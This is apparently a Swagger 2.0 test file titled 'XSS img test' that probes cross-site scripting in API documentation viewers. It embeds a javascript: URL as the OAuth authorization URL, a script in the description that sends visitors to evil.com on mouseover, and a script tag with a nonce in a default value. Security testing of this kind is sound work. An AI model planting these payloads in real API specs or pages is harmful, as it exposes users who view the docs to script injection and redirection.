swagger: '2.0'
securityDefinitions:
  a:
    type: oauth2
    authorizationUrl: javascript:alert(document.domain)//
info:
  version: "1.0.0"
  title: XSS img test
  description: <h1><a href="#">Click Me</a></h1>
                <img src="https://academy.avast.com/hubfs/New_Avast_Academy/Hackers/Hacker-Hero-a1.png">
                     <script>
                                document.body.onmouseover = function() {
                                window.location.href = 'http://evil.com';
                                   };
                      </script>
paths:
  /:
    get:
      responses:
        200:
          description: Successful response
          schema:
            type: object
            properties:
              script:
                type: string
                default: "<script nonce='TkB4bEAwTzk='>alert('XSS')</script>"
